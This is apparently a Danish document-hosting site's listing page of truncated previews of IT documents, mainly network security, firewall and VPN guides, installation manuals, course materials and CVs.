SSSystems.local. Netværk. Sikkerhed. Webserver SSSystems.local Netværk Vi har valgt at bygge vores netværk på en måde der sikre at trafik fra DMZ en ikke kan komme ned til vores LAN. Både ved hjælp af firewall regler og NAT. Men for at sikre at vi

Læs mere

Forår 2012 - Firewalls

Forår 2012 - Firewalls Syddansk Universitet DM830 - Netværkssikkerhed Imada - Institut for matematik og datalogi Forår 2012 - Firewalls Forfatter: Daniel Fentz Johansen Alexei Mihalchuk Underviser: Prof. Joan Boyar Indhold 1

Læs mere

En open source løsning til bibliotekernes publikumspc ere

En open source løsning til bibliotekernes publikumspc ere En open source løsning til bibliotekernes publikumspc ere Dokument: bibos installationsvejledning bibos version: 2.1.0.1 released 25. oktober 2013 Senest redigeret: 5. februar 2014 af Niels Schmidt Petersen,

Læs mere

System Center Operations Manager. Heterogen overvågning i praksis

System Center Operations Manager. Heterogen overvågning i praksis System Center Operations Manager Heterogen overvågning i praksis Agenda System Center Operations Manager Heterogen overvågning i praksis Hvad er heterogen overvågning? Metoder Fiktiv case praktiske eksempler

Læs mere

Databaseadgang fra Java

Databaseadgang fra Java Databaseadgang fra Java Grundlæggende Programmering med Projekt Peter Sestoft Fredag 2007-11-23 Relationsdatabasesystemer Der er mange databaseservere Microsoft Access del af Microsoft Office MySQL god,

Læs mere

Da beskrivelserne i danzig Profile Specification ikke er fuldt færdige, foreslås:

Da beskrivelserne i danzig Profile Specification ikke er fuldt færdige, foreslås: NOTAT 6. juni 2007 J.nr.: 331-3 LEA Bilag A danzig-møde 15.6.2007 Opdatering af DAN-1 og danzig Profile Specification Forslag til opdatering af Z39.50 specifikationerne efter udgivelse af Praksisregler

Læs mere

KRAV TIL INFRASTRUKTUR

KRAV TIL INFRASTRUKTUR KRAV TIL INFRASTRUKTUR VERSION 4.2.8 SEPTEMBER 2015 Indholdsfortegnelse 1 Generelt... 1 2 Servermæssige krav til -modulerne... 1 2.1 Systemmæssige krav i servermiljø... 1 2.2 Hardwaremæssige krav i servermiljø...

Læs mere

Bruger Manual PC Valtronics IP Kamera - Windows system

Bruger Manual PC Valtronics IP Kamera - Windows system Bruger Manual PC Valtronics IP Kamera - Windows system Brugervejledning til PC (windows) 1. Installation af kamera Vejledningen er almen for alle Valtronics kameraer, og derfor kan billederne af de forskellige

Læs mere

SOSIGW. - Driftsvejledning for SOSIGW 1.0. Indeks

SOSIGW. - Driftsvejledning for SOSIGW 1.0. Indeks SOSIGW - Driftsvejledning for SOSIGW 1.0 Indeks Indeks... 1 Revisionshistorik... 2 Introduktion... 2 Kontrol af korrekt driftstilstand... 2 Ændring af statisk konfiguration... 2 Logfil... 2 Backup... 3

Læs mere

Kvik start opsætning af kamera det første du skal gøre:

Kvik start opsætning af kamera det første du skal gøre: Kom godt i gang Tillykke med købet af Valtronics Trådløst IP kamera. Denne quickmanual kan bruges til alle Valtronics IP kameraer. Kameraet giver mulighed for at fjenovervåge steder via sin mobiltelefon

Læs mere

Softwareløsninger til dit netværk

Softwareløsninger til dit netværk www.draware.dk Softwareløsninger til dit netværk Overvågning Side 4 Analyse Side 11 Sikkerhed Side 14 Administration Side 21 Asset management Side 27 Dokumentation Side 30 Kundecitater Side 35 Bedre overblik

Læs mere

Michael Madsen. Kort beskrivelse. Erfaring. På udkig efter nye udfordringer - systemadministratortilbydes.dk michael@systemadministratortilbydes.

Michael Madsen. Kort beskrivelse. Erfaring. På udkig efter nye udfordringer - systemadministratortilbydes.dk michael@systemadministratortilbydes. Michael Madsen På udkig efter nye udfordringer - systemadministratortilbydes.dk michael@systemadministratortilbydes.dk Kort beskrivelse Ung udadvendt mand fra Århus, uddannet IT-teknolog fra Aarhus erhvervsakademi

Læs mere

3. Menuen Start -> Programs -> OpenVPN åbnes, og "My Certificate Wizard" vælges:

3. Menuen Start -> Programs -> OpenVPN åbnes, og My Certificate Wizard vælges: Opsætning af VPN forbindelse til DRC En VPN forbindelse gør det muligt for en hjemmecomputer, eller en bærbar computer, at få adgang til DRCs interne lokalnet fra en vilkårlig internetforbindelse. Forudsætninger

Læs mere

Sikkerhed i trådløst netværk

Sikkerhed i trådløst netværk Sikkerhed i trådløst netværk Når du opsætter et trådløst netværk betyder det at du kan benytte dit netværk uden at være forbundet med kabler, men det betyder også at andre kan gøre det samme, hvis du ikke

Læs mere

- Installationsvejledning for SOSIGW 1.0.6

- Installationsvejledning for SOSIGW 1.0.6 SOSIGW - Installationsvejledning for SOSIGW 1.0.6 Indeks Indeks... 1 Revisionshistorik... Introduktion... Forudsætninger og krav... Installér ønsket JDK.... Konfigurer JDK til ubegrænset kryptering...

Læs mere

EasyIQ ConnectAnywhere Release note

EasyIQ ConnectAnywhere Release note EasyIQ ConnectAnywhere Release note PC Klient 2.4.0.17 o Support for at Domain maskiner kan logge på ConnectAnywhere automatisk med Windows credentials Løsningen forudsætter/kræver at man logger på Windows

Læs mere

Tilslutning med Cisco AnyConnect VPN-klient (Windows) til AARHUS TECH P-net

Tilslutning med Cisco AnyConnect VPN-klient (Windows) til AARHUS TECH P-net 18. november 2011 Vejledning Windows 7 - eklient Opkobling via ADSL eller anden kabelforbindelse til P-net. Tilslutning med Cisco AnyConnect VPN-klient (Windows) til AARHUS TECH P-net Cisco AnyConnect

Læs mere

It-sikkerhedsstrategi i kommuner hvad giver mening at varetage internt og hvad kan outsources?

It-sikkerhedsstrategi i kommuner hvad giver mening at varetage internt og hvad kan outsources? It-sikkerhedsstrategi i kommuner hvad giver mening at varetage internt og hvad kan outsources? Klaus Kongsted, CRO, Dubex A/S Dubex A/S, den 5. maj 2015 Krav og udfordringer Avanceret infrastruktur og

Læs mere

De pakker du henter fra Sektornet Værktøjskassen ligger i filformatet jar. Dette er en komprimeringsformat på linie med Zip formattet.

De pakker du henter fra Sektornet Værktøjskassen ligger i filformatet jar. Dette er en komprimeringsformat på linie med Zip formattet. 1 FØR DU STARTER 1.1 JAR fil formatet De pakker du henter fra Sektornet Værktøjskassen ligger i filformatet jar. Dette er en komprimeringsformat på linie med Zip formattet. Har du installeret Winzip 9.0

Læs mere

WINDCHILL THE NEXT STEPS

WINDCHILL THE NEXT STEPS WINDCHILL THE NEXT STEPS PTC/user, 4. marts 2015 Jens Christian Jensen, Econocap Agenda Windchill the next steps Bliv opdateret og inspireret til at se hvor Windchill kan hjælpe dig med andet end blot

Læs mere

Backup Applikation. Microsoft Dynamics C5 Version 2008. Sikkerhedskopiering

Backup Applikation. Microsoft Dynamics C5 Version 2008. Sikkerhedskopiering Backup Applikation Microsoft Dynamics C5 Version 2008 Sikkerhedskopiering Indhold Sikkerhedskopiering... 3 Hvad bliver sikkerhedskopieret... 3 Microsoft Dynamics C5 Native database... 3 Microsoft SQL Server

Læs mere

LUDUS Web Installations- og konfigurationsvejledning

LUDUS Web Installations- og konfigurationsvejledning LUDUS Web Installations- og konfigurationsvejledning Indhold LUDUS Web Installations- og konfigurationsvejledning... 1 1. Forudsætninger... 2 2. Installation... 3 3. Konfiguration... 9 3.1 LUDUS Databasekonfiguration...

Læs mere

Kursus-introduktion. IT Sikkerhed Efterår 2012 04/09/2012 ITU 0.1

Kursus-introduktion. IT Sikkerhed Efterår 2012 04/09/2012 ITU 0.1 Kursus-introduktion IT Sikkerhed Efterår 2012 04/09/2012 ITU 0.1 Praktiske bemærkninger Kurset T6 (12 undervisningsuger): Forelæsninger (Lokale 4A22), Tirsdag 8:00 9:50 Øvelser (Lokale 4A54, 4A56), Tirsdag

Læs mere

Kom i gang med SAS STPbaserede

Kom i gang med SAS STPbaserede make connections share ideas be inspired Kom i gang med SAS STPbaserede webapplikationer Lars L. Andersson Chefkonsulent Webapplikationer Interaktion med serverbaserede data via skærmbilleder leveret gennem

Læs mere

Curriculum Vitae PETER VILLADSEN MOBIL: +45 5080 1010 E-MAIL: PVILLADSEN@GMAIL.COM RAVNSBORGVEJ 91 DK-4600 KØGE WWW.PVILLADSEN.DK

Curriculum Vitae PETER VILLADSEN MOBIL: +45 5080 1010 E-MAIL: PVILLADSEN@GMAIL.COM RAVNSBORGVEJ 91 DK-4600 KØGE WWW.PVILLADSEN.DK Curriculum Vitae PETER VILLADSEN MOBIL: +45 5080 1010 E-MAIL: PVILLADSEN@GMAIL.COM RAVNSBORGVEJ 91 DK-4600 KØGE WWW.PVILLADSEN.DK Profil Erfaren udvikler med teknisk indsigt. Arbejder pt. meget med udvikling

Læs mere

Get Instant Access to ebook Udleveret PDF at Our Huge Library UDLEVERET PDF. ==> Download: UDLEVERET PDF

Get Instant Access to ebook Udleveret PDF at Our Huge Library UDLEVERET PDF. ==> Download: UDLEVERET PDF UDLEVERET PDF ==> Download: UDLEVERET PDF UDLEVERET PDF - Are you searching for Udleveret Books? Now, you will be happy that at this time Udleveret PDF is available at our online library. With our complete

Læs mere

Ethereal Intro && Ethereal HTTP. René Hansen Anders Bjerg Pedersen Michael Nilou Hold 1 September 12, 2007

Ethereal Intro && Ethereal HTTP. René Hansen Anders Bjerg Pedersen Michael Nilou Hold 1 September 12, 2007 Ethereal Intro && Ethereal HTTP René Hansen Anders Bjerg Pedersen Michael Nilou Hold 1 September 12, 2007 1 Indledning Denne opgave går ud på at anvende programmet Wireshark til at analysere trafik over

Læs mere

Hosted Exchange. Setup guide for e-mail clients & mobile devices. Date: 2011-09-13. Version: 15. Author: SBJ/ANB. Target Level: Customer

Hosted Exchange. Setup guide for e-mail clients & mobile devices. Date: 2011-09-13. Version: 15. Author: SBJ/ANB. Target Level: Customer Hosted Exchange Setup guide for e-mail clients & mobile devices Date: 2011-09-13 Version: 15 Author: SBJ/ANB Target Level: Customer Target Audience: End User Language: en-us Page 1 of 35 LEGAL INFORMATION

Læs mere

User guide - For testing SFTP and HTTP/S data communication

User guide - For testing SFTP and HTTP/S data communication User guide - For testing SFTP and HTTP/S data communication with Nets Danmark A/S P. 1-9 Index General information... 3 Introduction... 3 Rights... 3 Limitations... 3 Prerequisites... 3 Preparations...

Læs mere

Velkommen på kursus hos Microworld

Velkommen på kursus hos Microworld Velkommen på kursus hos Microworld Du ønskes velkommen på kurset Windows 8 Workshop. Dette kursusmateriale er udarbejdet for at kunne fungere som arbejdsmateriale under selve kurset, men det er også meningen,

Læs mere